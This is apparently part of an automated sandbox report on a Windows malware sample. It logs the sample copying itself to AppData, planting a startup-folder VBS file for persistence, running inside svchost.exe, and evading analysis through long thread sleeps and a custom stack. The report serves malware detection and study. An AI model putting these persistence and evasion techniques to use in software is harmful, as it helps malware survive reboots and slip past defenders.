                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbsJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\demonetised.vbsJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E48111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00E48111
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00DFEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00DFEB42
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D88111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,2_2_00D88111
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeCode function: 2_2_00D3EB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,2_2_00D3EB42
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeCode function: 0_2_00E0123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00E0123A
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Switches to a custom stack to bypass stack traces
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeAPI/Special instruction interceptor: Address: 133C4AC
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeAPI/Special instruction interceptor: Address: 18205F4
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 52D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 52D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 72D0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 51A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 51A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 71A0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599808Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599688Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599578Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599469Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599359Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599250Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599126Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598890Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598781Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598672Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598563Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597441Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597281Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597140Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596703Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596594Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596484Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596375Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596266Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596156Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596047Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595938Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595813Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595688Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595563Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595339Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595234Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595125Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595016Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594891Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594781Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594571Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594469Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594235Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594110Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 593985Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599652Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599437Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599217Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599109Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599000Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598859Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598737Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598536Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598406Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598296Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598186Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598073Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597969Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597844Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597734Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597623Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597515Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597406Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597297Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597187Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597077Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596969Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596859Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596750Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596641Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596516Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596391Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596281Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596172Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596062Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595953Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595844Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595734Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595625Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595516Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595391Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595266Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595156Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595047Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594937Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594828Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594718Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594609Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594500Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594390Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594281Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594172Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594062Jump to behavior
                  Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 2091Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 7743Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 6472Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exeWindow / User API: threadDelayed 3364Jump to behavior
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeEvaded block: after key decisiongraph_0-94260
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeEvaded block: after key decision
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeEvaded block: after key decision
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95143
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
                  Source: C:\Users\user\Desktop\B7N48hmO78.exeAPI coverage: 4.5 %
                  Source: C:\Users\user\AppData\Local\inhumate\demonetised.exeAPI coverage: 4.8 %
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep count: 32 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -29514790517935264s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -600000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4308Thread sleep count: 2091 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599808s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599688s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 4308Thread sleep count: 7743 > 30Jump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599578s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599469s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599359s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599250s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599126s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -599000s >= -30000sJump to behavior
                  Source: C:\Windows\SysWOW64\svchost.exe TID: 432Thread sleep time: -598890s >= -30000sJump to behavior
